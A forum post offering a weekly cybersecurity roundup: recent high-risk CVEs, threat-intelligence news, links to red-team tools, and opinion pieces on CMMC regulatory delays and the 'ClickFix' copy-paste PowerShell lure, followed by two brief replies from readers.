Gibby’s Cybersecurity Roundup – 3/14/25

[gibby]

Hi everyone and welcome to the first edition of Gibby’s cybersecurity roundup. Each week, I’ll compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.

I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:

• TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
  
• Blue Team - The Security Team focused on Defense and Detection
  
• Red team - The Security Team focused on Attacks and Evasion 
  

If you want to see something added here let me know!

---

First, lets get started with this weeks new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones. 

High Risk: Publicly facing VMWare ESXi servers are getting smoked with a chain of vulnerabilities that allow hackers to execute code on the hypervisor. 
Find the Q&A about this here: https://github.com/vmware/vcf-security-a...-2025-0004
And more information about the vulnerability here: https://support.broadcom.com/web/ecx/sup...es/0/25390



High Risk: Microsoft Patch Tuesday fixes Seven 0-days and fifty-seven security flaws. 
Six of the Seven 0days were being publicly exploited (yay!). I wont list all of them, but the critical security updates are:
CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability
CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability
CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability
CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability
CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability
CVE-2025-26630 - Microsoft Access Remote Code Execution Vulnerability


High Risk: Fortinet released a number of patches for a slew of their products, some of which are high severity (again). 
Double check your devices here: https://www.fortiguard.com/psirt



High Risk: Hackers are using an old vulnerability to pop Cisco Small Business Routers. 
CISA added CVE-2023-20118  to its known exploited vulnerabilities catalog this week, meaning the bad guys are bad guying a 2 year old vulnerability. 
Check out Cisco’s Security Advisory here https://sec.cloudapps.cisco.com/security...n-ej76Pke5
 
 

---

 

Researchers have noted a 42% increase in Medusa ransomware attacks from 2023 to 2024, with incidents doubling in early 2025. Medusa, operated as a ransomware-as-a-service (RaaS) by the group tracked as Spearwing, employs double extortion tactics, steals and encrypts data.
https://www.security.com/threat-intellig...re-attacks
 
Silk Typhoon, a Chinese espionage group, is now using common IT tools for initial access, exploiting unpatched applications to escalate privileges within targeted organizations. After gaining access, they steal credentials to infiltrate networks and abuse various applications, including Microsoft services, for espionage. Microsoft's threat intelligence has detailed these tactics and offers security solutions and mitigation guidance to defend against these attacks.
https://www.microsoft.com/en-us/security...ply-chain/
 
Google Cloud CISO Phil Venables applies Jim Collins' flywheel concept to amplifying the effects of our security programs, walking through seven potential security flywheels. Those of you in a leadership role inside our outside Cybersecurity should give this a read
https://www.philvenables.com/post/turnin...y-flywheel
 
A two-year joint effort by Fortra, Microsoft's Digital Crimes Unit, and Health-ISAC has significantly disrupted ransomware operations by targeting the illicit use of Cobalt Strike and compromised Microsoft software. This campaign achieved an 80% reduction in unauthorized Cobalt Strike copies and seized over 200 malicious domains, drastically shortening the time between detecting and dismantling attacks to under a week in the U.S. and under two weeks globally.
https://www.cobaltstrike.com/blog/update...alt-strike
 

---

 

FBI Watchdog is a cyber threat intelligence OSINT tool that monitors domain DNS changes in real-time, specifically detecting law enforcement seizures. It alerts users via Telegram and Discord and captures screenshots of seized domains.
https://github.com/DarkWebInformer/FBI_Watchdog
 
APT-ATTACK-SIMULATION is a compilation of APT simulations (Russia, China, Iran, North Korea) that target many vital sectors, both private and governmental, including written tools, C2 servers, backdoors, exploitation techniques, stagers, bootloaders, and many other tools that attackers might have used in actual attacks.
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation
 

---

A tool created for the red team to test default credentials on SSH and WinRM and then execute scripts if logging in was successful.
https://github.com/RITRedteam/StreetCred

CaptainCrez is a modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.
https://github.com/synacktiv/captaincredz
 

---

Here is a spot where I’ll just generally soapbox when I want to.
 
This week I’ve had some discussions around two specific issues. One being regulation, specifically around CMMC, and the other being a new vector that attackers are using that is wildly successful despite it being incredibly obvious that it is bad.

CMMC Sucks and its not going anywhere for 4 more years
 
Let's first address regulatory compliance, specifically the Cybersecurity Maturity Model Certification (CMMC). For you non-US readers, CMMC is a framework designed to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB), a critical sector for national security. It aims to standardize and verify the implementation of cybersecurity best practices across all tiers of the supply chain, from essential support services to advanced research and development.
 
The anticipated release of the latest CMMC version has been delayed, likely until the next administration. This delay creates a significant challenge: a regulatory vacuum. This vacuum introduces ambiguity, hindering long-term strategic planning and investment in cybersecurity initiatives. Risk owners, from Directors to C-suite executives, are navigating the whiplash of shifting priorities, facing the difficult task of justifying resource allocation amidst regulatory uncertainty. The substantial resource allocation required for CMMC implementation, encompassing not only technology upgrades but also process redesign and workforce training, has been abruptly disrupted. This leaves internal CMMC champions, often IT and security leaders, facing skepticism and uncertainty from other stakeholders who may question the ROI of continued investment.
 
The resulting impact is a diminished perceived authority of cybersecurity regulations, particularly within the DIB. This uncertainty risks eroding future compliance efforts, potentially leading to continued resistance to essential security measures, such as multi-factor authentication, robust encryption, and continuous monitoring. In a rapidly evolving threat landscape, such resistance can significantly increase an organization's vulnerability.
 
This situation underscores the critical need for organizations to maintain a proactive and adaptable cybersecurity strategy, regardless of regulatory fluctuations. IT professionals must advocate for a risk-based approach, prioritizing security controls that align with industry best practices and address the most critical threats. This includes fostering a culture of security awareness, implementing robust security architectures, and establishing continuous monitoring and incident response capabilities. It is also essential to maintain open communication with stakeholders, demonstrating the ongoing value of cybersecurity investments and aligning security initiatives with broader business objectives.

TL;DR: CMMC delays create regulatory uncertainty, impacting cybersecurity budgets and adoption. IT pros must advocate for proactive security despite shifting regulations.

Please stop running malicious code willingly
 
If you're in Incident Response, you've probably seen a rise in this weird attack called 'ClickFix.' If not, buckle up for a wild ride! It's surprisingly simple, and that's why it's working. Here's how it goes:

• Fake Alert: Users get a pop-up or fake error message in their browser, looking like a legit system warning.
  
• Copy-Paste-Run: They're told to copy some code, right-click the Start button, and paste it into a PowerShell terminal and hit enter.
  

Yeah, it's working. And here's the kicker: it's hitting a specific group of users. Think back to the Windows 95 days. We used to tinker with everything—backgrounds, sounds, even HTML for our MySpace profiles. We broke stuff, fixed it, learned. Everyone did it.

Then came the iPad generation. They got locked-down devices, limited customization. They never played with command lines, never saw what 'Start > Run > cmd' did. They don't know what PowerShell is, let alone why running random code in it is a huge red flag.

So, when they see a pop-up telling them to run a long code in a terminal, they don't get that 'uh-oh' feeling. It looks normal, or at least not dangerous.
 
That's how people are getting tricked into running malicious code. They just don't know any better. This whole thing highlights a big problem: our security training isn't keeping up with how users have changed. We've got to show them how to spot red flags and get them asking questions. And, you know, maybe bring back a little bit of that healthy skepticism we all used to have.

TL;DR: "ClickFix" attack tricks users into running bad code in PowerShell. They don't know it's dangerous because of how they grew up with computers.


That's it for this week. Thanks for reading, y'all. See you next week. 

[mistiry]

This is awesome, looking forward to more of these!

To your point about the iPad generation: there is such a lack of the basics anymore, and everything has been obfuscated so much, that it does make me worry a bit for the field in general. Now, that same generation has access to even more tools like AI. Entire careers are being made in the IT field without ever having to learn how anything actually works.

[JollyRgrs]

yup, that is a very real concern. I think it is already an issue with gen z and even younger millennials and then you wanna talk about gen alpha? it's going to be like fishing in a barrel with dynamite.